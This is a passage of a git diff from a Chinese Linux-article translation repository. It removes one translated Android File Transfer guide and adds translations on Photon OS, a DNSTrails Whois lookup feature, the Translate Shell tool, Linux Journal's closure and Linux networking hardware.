https://www.suse.com/communities/blog/system-logs-understand-linux-system/ + +作者:[chabowski] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ diff --git a/translated/tech/20171124 How to Install Android File Transfer for Linux.md b/translated/tech/20171124 How to Install Android File Transfer for Linux.md deleted file mode 100644 index b93429f509..0000000000 --- a/translated/tech/20171124 How to Install Android File Transfer for Linux.md +++ /dev/null @@ -1,82 +0,0 @@ -Translating by wenwensnow - -# 如何在Linux下安装安卓文件传输助手 - -如果你尝试在Ubuntu下安装你的安卓手机,你也许可以试试Linux下的安卓文件传输助手 - -本质上来说,这个应用是谷歌mac版本的一个复制。它是用Qt编写的,用户界面非常简洁,使得你能轻松在Ubuntu和安卓手机之间传输文件。 - -现在,有可能一部分人想知道有什么是这个应用可以做,而Nautilus(Ubuntu默认的文件资源管理器)不能做的,答案是没有。 - -当我将我的 Nexus 5X(记得选择[MTP][7] 选项)连接在Ubuntu上时,在[GVfs][8](Gnome桌面下的虚拟文件系统)的帮助下,我可以打开,浏览和管理我的手机, 就像它是一个普通的U盘一样。 - - [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] - -但是一些用户在使用默认的文件管理器时,在MTP的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 - -这就是要为Linux系统用户设计一个安卓文件传输助手应用的原因。将这个应用当做将MTP设备安装在Linux下的另一种选择。如果你使用Linux下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 - - -![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) - -app特点: - -*   简洁直观的用户界面 - -*   支持文件拖放功能(从Linux系统到手机) - -*   支持批量下载 (从手机到Linux系统) - -*   显示传输进程对话框 - -*   FUSE模块支持 - -*   没有文件大小限制 - -*   可选命令行工具 - -### Ubuntu下安装安卓手机文件助手的步骤 - -以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 - -这有一个[PPA](个人软件包集)源为Ubuntu 14.04 LTS(长期支持版本),16.04LTS 和 Ubuntu17.10 提供可用应用 - -为了将这一PPA加入你的软件资源列表中,执行这条命令: - -``` -sudo add-apt-repository ppa:samoilov-lex/aftl-stable -``` - -接着,为了在Ubuntu下安装Linux版本的安卓文件传输助手,执行: - -``` -sudo apt-get update && sudo apt install android-file-transfer -``` - -这样就行了。 - -你会在你的应用列表中发现这一应用的启动图标。 - -在你启动这一应用之前,要确保没有其他应用(比如Nautilus)已经加载了你的手机.如果其他应用正在使用你的手机,就会显示“无法找到MTP设备”。为了解决这一问题,将你的手机从Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux - -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/app -[3]:http://www.omgubuntu.co.uk/category/download -[4]:https://github.com/whoozle/android-file-transfer-linux -[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux -[6]:http://android.com/filetransfer?linkid=14270770 -[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol -[8]:https://en.wikipedia.org/wiki/GVfs -[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg -[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md new file mode 100644 index 0000000000..e51c580da9 --- /dev/null +++ b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -0,0 +1,147 @@ +Photon也许能成为你最喜爱的容器操作系统 +============================================================ + +![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") + +Phonton OS专注于容器,是一个非常出色的平台。 —— Jack Wallen + +容器在当下的火热,并不是没有原因的。正如[之前][13]讨论的,容器可以使您轻松快捷地将新的服务与应用部署到您的网络上,而且并不耗费太多的系统资源。比起专用硬件和虚拟机,容器都是更加划算的,除此之外,他们更容易更新与重用。 + +更重要的是,容器喜欢Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台Linux服务器,运行[Docker][14],再是部署容器。但是,哪种Linux发行版最适合部署容器呢?我们的选择很多。你可以使用标准的Ubuntu服务器平台(更容易安装Docker并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 + +[Photon][15]就是这样的一个发行版。这个特殊的版本是由[VMware][16]于2005年创建的,它包含了Docker的守护进程,并与容器框架(如Mesos和Kubernetes)一起使用。Photon经过优化可与[VMware vSphere][17]协同工作,而且可用于裸机,[Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], 或者 [VirtualBox][21]等。 + +Photon通过只安装Docker守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有300MB。但这足以让Linux的运行一切正常。除此之外,Photon的主要特点还有: + +* 内核调整为性能模式。 + +* 内核根据[内核自防护项目][6](KSPP)进行了加固。 + +* 所有安装的软件包都根据加固的安全标识来构建。 + +* 操作系统在信任验证后启动。 + +* Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 + +* 支持持久卷。 + +* [Project Lightwave][7] 整合。 + +* 及时的安全补丁与更新。 + +Photon可以通过[ISO][22],[OVA][23],[Amazon Machine Image][24],[Google Compute Engine image][25]和[Azure VHD][26]安装使用。现在我将向您展示如何使用ISO镜像在VirtualBox上安装Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 + +### 创建虚拟机 + +在部署第一台容器之前,您必须先创建一台虚拟机并安装Photon。为此,打开VirtualBox并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为Photon提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在VirtualBox主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 + +在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的Photon服务与您的网络相连。完成更改后,单击确定。 + +### [photon_0.jpg][8] + +![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change setatings") +图 1: 更改Photon在VirtualBox中的网络设置。[经许可使用][1] + +从左侧的导航选择您的Photon虚拟机,点击启动。系统会提示您去加载IOS镜像。当您完成之后,Photon安装程序将会启动并提示您按回车后开始安装。安装过程基于ncurses(没有GUI),但它非常简单。 + +接下来(图2),系统会询问您是要最小化安装,完整安装还是安装OSTree服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 + +### [photon_1.jpg][9] + +![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") +图 2: 选择您的安装类型.[经许可使用][2] + +在下一个窗口,选择您要安装Photon的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到5分钟的时间内结束。 + +### [photon_2.jpg][] + +![Photon](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") +图 3: 选择安装Photon的硬盘.[经许可使用][3] + +安装完成后,重启虚拟机并使用安装时创建的用户root和它的密码登录。一切就绪,你准备好开始工作了。 + +在开始使用Docker之前,您需要更新一下Photon。Photon使用 _yum_ 软件包管理器,因此在以root用户登录后输入命令 _yum update_。如果有任何可用更新,则会询问您是否确认(图4)。 + +### [photon_3.jpg][11] + +![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") +图 4: 更新 Photon.[经许可使用][4] + +用法 + +正如我所说的,Photon提供了部署容器甚至创建Kubernetes集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动Docker守护进程。为此,执行以下命令: + +``` +systemctl start docker + +systemctl enable docker +``` + +现在我们需要创建一个标准用户,因此我们没有以root去运行docker命令。为此,执行以下命令: + +``` +useradd -m USERNAME + +passwd USERNAME +``` + +其中USERNAME是我们新增的用户的名称。 + +接下来,我们需要将这个新用户添加到 _docker_ 组,执行命令: + +``` +usermod -a -G docker USERNAME +``` + +其中USERNAME是刚刚创建的用户的名称。 + +注销root用户并切换为新增的用户。现在,您已经可以不必使用 _sudo_ 命令或者是切换到root用户来使用 _docker_命令了。从Docker Hub中取出一个镜像开始部署容器吧。 + +### 一个优秀的容器平台 + +在专注于容器方面,Photon毫无疑问是一个出色的平台。请注意,Photon是一个开源项目,因此没有任何付费支持。如果您对Photon有任何的问题,请移步Photon项目的Github下的[Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对Photon感兴趣,您也可以在项目的官方[Github][28]中找到源码。 + +尝试一下Photon吧,看看它是否能够使得Docker容器和Kubernetes集群的部署更加容易。 + +欲了解Linux的更多信息,可以通过学习Linux基金会和edX的免费课程,[“Linux 入门”][29]。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os + +作者:[JACK WALLEN][a] +译者:[KeyLD](https://github.com/KeyLd) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/creative-commons-zero +[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project +[7]:http://vmware.github.io/lightwave/ +[8]:https://www.linux.com/files/images/photon0jpg +[9]:https://www.linux.com/files/images/photon1jpg +[10]:https://www.linux.com/files/images/photon2jpg +[11]:https://www.linux.com/files/images/photon3jpg +[12]:https://www.linux.com/files/images/photon-linuxjpg +[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux +[14]:https://www.docker.com/ +[15]:https://vmware.github.io/photon/ +[16]:https://www.vmware.com/ +[17]:https://www.vmware.com/products/vsphere.html +[18]:https://azure.microsoft.com/ +[19]:https://cloud.google.com/compute/ +[20]:https://aws.amazon.com/ec2/ +[21]:https://www.virtualbox.org/ +[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS +[27]:https://github.com/vmware/photon/issues +[28]:https://github.com/vmware/photon +[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux diff --git a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md b/translated/tech/20171130 New Feature Find every domain someone owns automatically.md new file mode 100644 index 0000000000..4b72eaae5e --- /dev/null +++ b/translated/tech/20171130 New Feature Find every domain someone owns automatically.md @@ -0,0 +1,49 @@ +新功能:自动找出每个域名的拥有者 +============================================================ + + +今天,我们很高兴地宣布我们最近几周做的新功能。它是 Whois 聚合工具,现在可以在 [DNSTrails][1] 上获得。 + +在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名指向一个 IP 地址,以便找到同一个人拥有的其他域名。 + +使用老的方法,你会很轻易地在一个工具和另外一个工具的研究和交叉比较结果中花费数个小时,直到得到你想要的域名。 + +感谢这个新工具和我们的智能[WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 + +### 我如何使用Whois聚合功能? + +第一步:打开 [DNSTrails.com][3] + +第二步:搜索任何域名,比如:godaddy.com + +第三步:在得到域名的结果后,如下所见,定位下面的 Whois 信息: + +![Domain name search results](https://securitytrails.com/images/a/a/1/3/f/aa13fa3616b8dc313f925bdbf1da43a54856d463-image1.png) + +第四步:你会看到那里有有关域名的电话和电子邮箱地址。 + +第五步:点击右边的链接,你会轻松地找到用相同电话和邮箱注册的域名。 + +![All domain names by the same owner](https://securitytrails.com/images/1/3/4/0/3/134037822d23db4907d421046b11f3cbb872f94f-image2.png) + +如果你正在调查互联网上任何个人的域名所有权,这意味着即使域名甚至没有指向注册服务商的 IP,如果他们使用相同的电话和邮件地址,我们仍然可以发现其他域名。 + +想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的[ WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 + +-------------------------------------------------------------------------------- + +via: https://securitytrails.com/blog/find-every-domain-someone-owns + +作者:[SECURITYTRAILS TEAM ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://securitytrails.com/blog/find-every-domain-someone-owns +[1]:https://dnstrails.com/ +[2]:https://securitytrails.com/forensics +[3]:https://dnstrails.com/ +[4]:http://dnstrails.com/#/domain/domain/ueland.com +[5]:https://dnstrails.com/ +[6]:https://securitytrails.com/contact diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md new file mode 100644 index 0000000000..9f905bd496 --- /dev/null +++ b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -0,0 +1,400 @@ +Translate Shell: 一款在 Linux 命令行中使用 Google Translate的工具 +============================================================ + +我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用. + +我写过很多关于 CLI 应用的文章。 最近我发现了一些 google 的 CLI 工具,像 “Google Translator”, “Google Calendar”, 和 “Google Contacts”。 这里,我想在给大家分享一下。 + +今天我们要介绍的是 “Google Translator” 工具。 由于母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 + +`Google translate` 为其他语系的人们所广泛使用。 + +### 什么是 Translate Shell + +[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助 `Google Translate`(默认), `Bing Translator`, `Yandex.Translate` 以及 `Apertium` 来翻译的命令行翻译器。 +它让你可以在终端访问这些翻译引擎. `Translate Shell` 在大多数Linux发行版中都能使用。 + +### 如何安装 Translate Shell + +有三种方法安装 `Translate Shell`。 + +* 下载自包含的可执行文件 + +* 手工安装 + +* 通过包挂力气安装 + +#### 方法-1 : 下载自包含的可执行文件 + +下载自包含的可执行文件放到 `/usr/bin` 目录中。 + +```shell +$ wget git.io/trans +$ chmod +x ./trans +$ sudo mv trans /usr/bin/ +``` + +#### 方法-2 : 手工安装 + +克隆 `Translate Shell` github 仓库然后手工编译。 + +```shell +$ git clone https://github.com/soimort/translate-shell && cd translate-shell +$ make +$ sudo make install +``` + +#### 方法-3 : Via Package Manager + +有些发行版的官方仓库中包含了 `Translate Shell`,可以通过包管理器来安装。 + +对于 Debian/Ubuntu, 使用 [APT-GET Command][3] 或者 [APT Command][4]来安装。 + +```shell +$ sudo apt-get install translate-shell +``` + +对于 Fedora, 使用 [DNF Command][5] 来安装。 + +```shell +$ sudo dnf install translate-shell +``` + +对于基于 Arch Linux 的系统, 使用 [Yaourt Command][6] 或 [Packer Command][7] 来从 AUR 仓库中安装。 + +```shell +$ yaourt -S translate-shell +or +$ packer -S translate-shell +``` + +### 如何使用 Translate Shell + +安装好后,打开终端闭关输入下面命令。 `Google Translate` 会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 + +``` +$ trans [Words] +``` + +下面我将泰米尔语中的单词 “நன்றி” (Nanri) 翻译成英语。 这个单词的意思是感谢别人。 + +``` +$ trans நன்றி +நன்றி +(Naṉṟi) + +Thanks + +Definitions of நன்றி +[ தமிழ் -> English ] + +noun + gratitude + நன்றி + thanks + நன்றி + +நன்றி + Thanks +``` + +使用下面命令也能将英语翻译成泰米尔语。 + +``` +$ trans :ta thanks +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி +``` + +要将一个单词翻译到多个语种可以使用下面命令(本例中, 我将单词翻译成泰米尔语以及印地语)。 + +``` +$ trans :ta+hi thanks +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி + +thanks +/THaNGks/ + +धन्यवाद +(dhanyavaad) + +Definitions of thanks +[ English -> हिन्दी ] + +noun + धन्यवाद + thanks, thank, gratitude, thankfulness, felicitation + +thanks + धन्यवाद, शुक्रिया +``` + +使用下面命令可以将多个单词当成一个参数(句子)来进行翻译。(只需要把句子应用起来作为一个参数就行了)。 + +``` +$ trans :ta "what is going on your life?" +what is going on your life? + +உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +(Uṅkaḷ vāḻkkaiyil eṉṉa naṭakkiṟatu?) + +Translations of what is going on your life? +[ English -> தமிழ் ] + +what is going on your life? + உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +``` + +下面命令独立地翻译各个单词。 + +``` +$ trans :ta curios happy +curios + +ஆர்வம் +(Ārvam) + +Translations of curios +[ Română -> தமிழ் ] + +curios + ஆர்வம், அறிவாளிகள், ஆர்வமுள்ள, அறிய, ஆர்வமாக +happy +/ˈhapē/ + +சந்தோஷமாக +(Cantōṣamāka) + +Definitions of happy +[ English -> தமிழ் ] + + மகிழ்ச்சியான + happy, convivial, debonair, gay + திருப்தி உடைய + happy + +adjective + இன்பமான + happy + +happy + சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா +``` + +简洁模式: 默认情况下,`Translate Shell` 尽可能多的显示翻译信息. 如果你希望只显示简要信息,只需要加上`-b`选项。 + +``` +$ trans -b :ta thanks +நன்றி +``` + +字典模式: 加上 `-d` 可以把 `Translate Shell` 当成字典来用. + +``` +$ trans -d :en thanks +thanks +/THaNGks/ + +Synonyms + noun + - gratitude, appreciation, acknowledgment, recognition, credit + + exclamation + - thank you, many thanks, thanks very much, thanks a lot, thank you kindly, much obliged, much appreciated, bless you, thanks a million + +Examples + - In short, thanks for everything that makes this city great this Thanksgiving. + + - many thanks + + - There were no thanks in the letter from him, just complaints and accusations. + + - It is a joyful celebration in which Bolivians give thanks for their freedom as a nation. + + - festivals were held to give thanks for the harvest + + - The collection, as usual, received a great response and thanks is extended to all who subscribed. + + - It would be easy to dwell on the animals that Tasmania has lost, but I prefer to give thanks for what remains. + + - thanks for being so helpful + + - It came back on about half an hour earlier than predicted, so I suppose I can give thanks for that. + + - Many thanks for the reply but as much as I tried to follow your advice, it's been a bad week. + + - To them and to those who have supported the office I extend my grateful thanks . + + - We can give thanks and words of appreciation to others for their kind deeds done to us. + + - Adam, thanks for taking time out of your very busy schedule to be with us tonight. + + - a letter of thanks + + - Thank you very much for wanting to go on reading, and thanks for your understanding. + + - Gerry has received a letter of thanks from the charity for his part in helping to raise this much needed cash. + + - So thanks for your reply to that guy who seemed to have a chip on his shoulder about it. + + - Suzanne, thanks for being so supportive with your comments on my blog. + + - She has never once acknowledged my thanks , or existence for that matter. + + - My grateful thanks go to the funders who made it possible for me to travel. + + - festivals were held to give thanks for the harvest + + - All you secretaries who made it this far into the article… thanks for your patience. + + - So, even though I don't think the photos are that good, thanks for the compliments! + + - And thanks for warning us that your secret service requires a motorcade of more than 35 cars. + + - Many thanks for your advice, which as you can see, I have passed on to our readers. + + - Tom Ryan was given a bottle of wine as a thanks for his active involvement in the twinning project. + + - Mr Hill insists he has received no recent complaints and has even been sent a letter of thanks from the forum. + + - Hundreds turned out to pay tribute to a beloved former headteacher at a memorial service to give thanks for her life. + + - Again, thanks for a well written and much deserved tribute to our good friend George. + + - I appreciate your doing so, and thanks also for the compliments about the photos! + +See also + Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this +``` + +使用下面格式可以使用 `Translate Shell` 来翻译文件。 + +```shell +$ trans :ta file:///home/magi/gtrans.txt +உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? +``` + +下面命令可以让 `Translate Shell` 进入交互模式. 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 + +``` +$ trans -shell en:ta thanks +Translate Shell +(:q to quit) +thanks +/THaNGks/ + +நன்றி +(Naṉṟi) + +Definitions of thanks +[ English -> தமிழ் ] + +noun + நன்றி + gratitude, thanks + +thanks + நன்றி +``` + +想知道语言代码,可以执行下面语言。 + +```shell +$ trans -R +``` +或者 +```shell +$ trans -T +┌───────────────────────┬───────────────────────┬───────────────────────┐ +│ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ +│ Albanian - sq │ Hmong - hmn │ Querétaro Otomi- otq │ +│ Amharic - am │ Hmong Daw - mww │ Romanian - ro │ +│ Arabic - ar │ Hungarian - hu │ Russian - ru │ +│ Armenian - hy │ Icelandic - is │ Samoan - sm │ +│ Azerbaijani - az │ Igbo - ig │ Scots Gaelic - gd │ +│ Basque - eu │ Indonesian - id │ Serbian (Cyr...-sr-Cyrl +│ Belarusian - be │ Irish - ga │ Serbian (Latin)-sr-Latn +│ Bengali - bn │ Italian - it │ Sesotho - st │ +│ Bosnian - bs │ Japanese - ja │ Shona - sn │ +│ Bulgarian - bg │ Javanese - jv │ Sindhi - sd │ +│ Cantonese - yue │ Kannada - kn │ Sinhala - si │ +│ Catalan - ca │ Kazakh - kk │ Slovak - sk │ +│ Cebuano - ceb │ Khmer - km │ Slovenian - sl │ +│ Chichewa - ny │ Klingon - tlh │ Somali - so │ +│ Chinese Simp...- zh-CN│ Klingon (pIqaD)tlh-Qaak Spanish - es │ +│ Chinese Trad...- zh-TW│ Korean - ko │ Sundanese - su │ +│ Corsican - co │ Kurdish - ku │ Swahili - sw │ +│ Croatian - hr │ Kyrgyz - ky │ Swedish - sv │ +│ Czech - cs │ Lao - lo │ Tahitian - ty │ +│ Danish - da │ Latin - la │ Tajik - tg │ +│ Dutch - nl │ Latvian - lv │ Tamil - ta │ +│ English - en │ Lithuanian - lt │ Tatar - tt │ +│ Esperanto - eo │ Luxembourgish - lb │ Telugu - te │ +│ Estonian - et │ Macedonian - mk │ Thai - th │ +│ Fijian - fj │ Malagasy - mg │ Tongan - to │ +│ Filipino - tl │ Malay - ms │ Turkish - tr │ +│ Finnish - fi │ Malayalam - ml │ Udmurt - udm │ +│ French - fr │ Maltese - mt │ Ukrainian - uk │ +│ Frisian - fy │ Maori - mi │ Urdu - ur │ +│ Galician - gl │ Marathi - mr │ Uzbek - uz │ +│ Georgian - ka │ Mongolian - mn │ Vietnamese - vi │ +│ German - de │ Myanmar - my │ Welsh - cy │ +│ Greek - el │ Nepali - ne │ Xhosa - xh │ +│ Gujarati - gu │ Norwegian - no │ Yiddish - yi │ +│ Haitian Creole - ht │ Pashto - ps │ Yoruba - yo │ +│ Hausa - ha │ Persian - fa │ Yucatec Maya - yua │ +│ Hawaiian - haw │ Polish - pl │ Zulu - zu │ +│ Hebrew - he │ Portuguese - pt │ │ +└───────────────────────┴───────────────────────┴───────────────────────┘ +``` + +想了解更多选项的内容,可以查看 `man` 页. + +```shell +$ man trans +``` + +-------------------------------------------------------------------------------- + +via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ + +作者:[Magesh Maruthamuthu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.2daygeek.com/author/magesh/ +[2]:https://github.com/soimort/translate-shell +[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ +[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ +[5]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/ +[6]:https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/ +[7]:https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/ diff --git a/translated/tech/20171201 Linux Journal Ceases Publication.md b/translated/tech/20171201 Linux Journal Ceases Publication.md new file mode 100644 index 0000000000..2eb5c82f51 --- /dev/null +++ b/translated/tech/20171201 Linux Journal Ceases Publication.md @@ -0,0 +1,34 @@ +Linux Journal 停止发行 +============================================================ + +EOF + +伙计们,看起来我们要到终点了。如果按照计划而且没有什么其他的话,十一月份的 Linux Journal 将是我们的最后一期。 + +简单的事实是,我们已经用完了钱和期权。我们从来没有一个富有的母公司或者自己深厚的资金,从开始到结束,这使得我们变成一个反常的出版商。虽然我们在很长的一段时间内运营着,但当天平不可恢复地最终向相反方向倾斜时,我们在十一月份失去了最后一点支持。 + +虽然我们像看到出版业的过去那样看到出版业的未来 - 广告商赞助出版物的时代,因为他们重视品牌和读者 - 我们如今的广告宁愿追逐眼球,最好是在读者的浏览器中植入跟踪标记,并随时随地展示那些广告。但是,未来不是这样,过去的已经过去了。 + +我们猜想,有一个希望,那就是救世主可能会会来。但除了我们的品牌、我们的档案,我们的域名、我们的用户和读者之外,还必须是愿意承担我们一部分债务的人。如果你认识任何人能够提供认真的报价,请告诉我们。不然,请观看 LinuxJournal.com,并希望至少我们的遗留归档(可以追溯到 Linux Journal 诞生的 1994 年 4 月,当 Linux 命中 1.0 发布时)将不会消失。这里有很多很棒的东西,还有很多我们会痛恨世界失去的历史。 + +我们最大的遗憾是,我们甚至没有足够的钱回馈最看重我们的人:我们的用户。为此,我们不能更深刻或真诚地道歉。我们对订阅者而言有什么: + +Linux Pro Magazine 为我们的用户提供了六本免费的杂志,我们在 Linux Journal 上一直赞叹这点。在我们需要的时候,他们是我们的第一批人,我们感谢他们的恩惠。我们今天刚刚完成了我们的 2017 年归档,其中包括我们曾经发表过的每一个问题,包括第一个和最后一个。通常我们以 25 美元的价格出售,但显然用户将免费获得。订阅者请注意有关两者的详细信息的电子邮件。 + +我们也希望在知道我们非常非常努力地让 Linux Journal 进行下去后能有一些安慰 ,而且我们已经用最精益、小的可能运营了很长一段时间。我们是一个大多数是自愿者的组织,有些员工已经几个月没有收到工资。我们还欠钱给自由职业者。这时一个限制发行商能够维持多长时间的限制,现在这个限制已经到头了。 + +伙计们,这是一个伟大的运营。乡亲。对每一个为我们的诞生、我们的成功和我们多年的坚持作出贡献的人致敬。我们列了一份名单,但是列表太长了,并且漏掉有价值的人的风险很高。你知道你是谁。我们再次感谢。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/linux-journal-ceases-publication + +作者:[ Carlie Fairchild][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/carlie-fairchild +[1]:https://www.linuxjournal.com/taxonomy/term/29 +[2]:https://www.linuxjournal.com/users/carlie-fairchild diff --git a/translated/tech/Linux Networking Hardware for Beginners: Think Software b/translated/tech/Linux Networking Hardware for Beginners: Think Software new file mode 100644 index 0000000000..a236a80e97 --- /dev/null +++ b/translated/tech/Linux Networking Hardware for Beginners: Think Software @@ -0,0 +1,89 @@ +Translating by FelixYFZ + +面向初学者的Linux网络硬件: 软件工程思想 +============================================================ + +![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") + 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 +Commons Zero][3]Pixabay + + 上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 +### Routers:路由器 + + +网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛, + +图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到Internet上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商提供的电缆箱,调制调节器,卫星上行系统...好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子,当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 + + +### [fig-1.png][4] + +![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") + +图一:一个简单的有线局域网和一个无线接入点。 + 